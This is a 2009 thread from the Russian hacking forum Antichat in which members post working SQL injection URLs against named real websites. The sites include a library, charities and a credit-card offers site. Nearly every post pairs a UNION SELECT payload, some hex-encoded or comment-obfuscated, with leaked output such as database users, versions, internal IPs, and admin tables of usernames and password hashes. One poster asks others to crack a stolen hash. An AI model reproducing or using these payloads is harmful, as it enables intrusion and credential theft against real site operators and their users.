Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
16.11.2009, 22:18
|
|
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме:
6075534
Репутация:
2731
|
|
Код:
http://www.artero.ru/album.php?p=1&n=530)+and+null+union+select+1,2,3,concat_ws(0x3a,user(),database(),version()),5,6,7,8,9%23
Код:
db0743811@10.0.0.33:db0743811:5.0.51a
|
|
|
17.11.2009, 16:06
|
|
Участник форума
Регистрация: 11.10.2009
Сообщений: 116
Провел на форуме:
472147
Репутация:
211
|
|
esamiafrica@localhost:4.1.20:esamiafrica_site
Код:
http://www.esami-africa.org/research.php?id=-61+union+select+concat_ws(0x3a,id,username,pword)+from+admin--
Жаль хэшык неразбрутил(... кому удастся отпишитесь плиз.... |
|
|
|
17.11.2009, 16:52
|
|
Участник форума
Регистрация: 30.10.2009
Сообщений: 103
Провел на форуме:
736224
Репутация:
388
|
|
http://www.labgear.co.uk/news.php?nid=2+union+select+column_name,2+from+inf ormation_schema.columns+where+table_name=0x6c61626 76561725f
labgear_users::users_id:users_name:users_pass
http://www.labgear.co.uk/news.php?nid=2+union+select+concat_ws(0x3a,users_i d,users_name,users_pass),2+from+labgear_users
________
http://www.labgear.co.uk/news.php?nid=2+union+select+column_name,2+from+inf ormation_schema.columns+where+table_name=0x7068706 2625f7573657273
phpbb_users::user_id:username:user_password
http://www.labgear.co.uk/news.php?nid=2+union+select+concat_ws(0x3a,user_id ,username,user_password),2+from+phpbb_users
MySQL 5.0.77-log
выводит все строки сразу
|
|
|
|
17.11.2009, 17:30
|
|
Members of Antichat - Level 5
Регистрация: 28.05.2007
Сообщений: 729
Провел на форуме:
5571194
Репутация:
1934
|
|
1.http://www.thestream.tv/series.php?s=-1+and+1=0+union+select+1,2,3,4,5,table_name,7,8,9, 10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26 +from+information_schema.tables--+- 2. и намного более извращённый вариант, но интересный =)
инъект в 18 поле инъекта.
разделитель - %0А - перевод строки 2
union
select
1,2,table_name,4,5,6,7,8,9,10
from
information_schema.tables
#
в hex.
вывод information_schema http://www.thestream.tv/watch.php?v=-1+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,0x320A756E696F6E0A73656C6563740A312C322C746 1626C655F6E616D652C342C352C362C372C382C392C31300A6 6726F6D0A696E666F726D6174696F6E5F736368656D612E746 1626C65730A23,19,20,21,22,23,24,25,26--+-
__________________
Появляюсь редко. Важные дела в реале.
|
|
|
|
17.11.2009, 18:08
|
|
Участник форума
Регистрация: 08.02.2009
Сообщений: 196
Провел на форуме:
1420275
Репутация:
127
|
|
152 колонки 
PR5 тИЦ40
Код:
http://www.skbcases.com/music/products/proddetail.php?c=85&id=431+and+1=0+union+select+1,2,3,4,5,concat_ws(0x3a,version(),user(),database()),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100,101,102,103,104,105,106,107,108,109,110,111,112,113,114,115,116,117,118,119,120,121,122,123,124,125,126,127,128,129,130,131,132,133,134,135,136,137,138,139,140,141,142,143,144,145,146,147,148,149,150,151,152--
4.0.12-standard-log:skbcases@localhost:skbcases |
|
|
|
17.11.2009, 18:47
|
|
Участник форума
Регистрация: 30.10.2009
Сообщений: 103
Провел на форуме:
736224
Репутация:
388
|
|
http://bam-boo.mobi/news.php?page=&year=2009&nid=2+union+select+1,colu mn_name,3+from+information_schema.columns+where+ta ble_name=0x61646d696e
admin::login,password,work
MySQL 5.0.51a-24+lenny1-log
http://bam-boo.mobi/news.php?page=&year=2009&nid=2+union+select+1,conc at_ws(0x3a,login,password,work),3+from+admin
Последний раз редактировалось Bb0y; 17.11.2009 в 19:00..
|
|
|
|
17.11.2009, 18:51
|
|
Участник форума
Регистрация: 18.04.2009
Сообщений: 120
Провел на форуме:
435863
Репутация:
80
|
|
yizkor.nypl.org
Вашему вниманию предлагаю базу данных Оракул!
Код:
http://yizkor.nypl.org/index.php?id=-1158+union+select+null,user,null,null,null,null,null,null,null,null,null,null+from+sys.dual+--+
User: YIZKOR
Удалось вывести парочку таблиц:
NYPL_YIZKOR_BOOKS
DUAL
DEF$_TEMP$LOB
Код:
http://yizkor.nypl.org/index.php?id=-1158+union+select+null,table_name,null,null,null,null,null,null,null,null,null,null+from+sys.all_tables+where+rownum+<=+5+--+
P.S. Вывод данных осуществляется в столбик, который к сожалению визуально не видно. Но по скольку мы крутые ребята, то открываем исходник. Находим строку
на первой же странице, листать далеко не надо. Именно между кавычек и осуществляется вывод информации  Вот так вот.
|
|
|
|
17.11.2009, 23:53
|
|
Участник форума
Регистрация: 08.02.2009
Сообщений: 196
Провел на форуме:
1420275
Репутация:
127
|
|
PR4
Код:
http://www.managingmoney.com/lc_card_main.php?id=-100552720/**/union/**/select/**/1,2,concat_ws(0x3a,version(),database(),user()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100,101,102,103,104,105/*
4.1.22-standard-log:cardoffers:creditcards@208.53.48.144
PR4
Код:
http://www.thealbany.org.uk/whatson_music_detail.php?ID=-344/**/union/**/select/**/1,concat_ws(0x3a,username,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16/**/from/**/members--+
5.0.77-log:so_uk_net@195.8.80.50:so_uk_net
Последний раз редактировалось Gaus; 18.11.2009 в 00:37..
|
|
|
|
18.11.2009, 13:22
|
|
Участник форума
Регистрация: 18.04.2009
Сообщений: 120
Провел на форуме:
435863
Репутация:
80
|
|
waterandclimate.org
Код:
http://www.waterandclimate.org/?id=news_details&nid=-93+union+select+1,2,3,concat(version(),0x3A3A,user(),0x3A3A,database()),5,6,7,8,9,10,11+--+
Version: 5.0.21-community
User: WaterAndClimate@dc.ihe.nl
Database: wac
OS: Win32
Таблицы:
Код:
http://www.waterandclimate.org/?id=news_details&nid=-93+union+select+1,2,3,table_name,5,6,7,8,9,10,11+from+information_schema.tables+limit+0,1+--+
Присутствует таблица members:
mid
fname
lname
organization
country
Но к сожалению в ней особо ничего полезного нету.
|
|
|
|
18.11.2009, 20:58
|
|
Участник форума
Регистрация: 22.10.2007
Сообщений: 119
Провел на форуме:
598447
Репутация:
123
|
|
PR6
http://www.artidea.org/event.php?id=999+union+select+1,2,3,4,version%28%2 9,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21--
System information:
-----------------------------------------
basedir:/usr/
base:artidea_db1
user:ai_db_user@localhost
os:redhat-linux-gnu
ver:5.0.45
datadir:/var/lib/mysql/
tmpdir:/tmp/
[ username,password,id ] from [ artidea_db1.admin_users ]
-----------------------------------------
Сорри.. Больше так не буду )
Последний раз редактировалось hackmen; 19.11.2009 в 06:49..
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
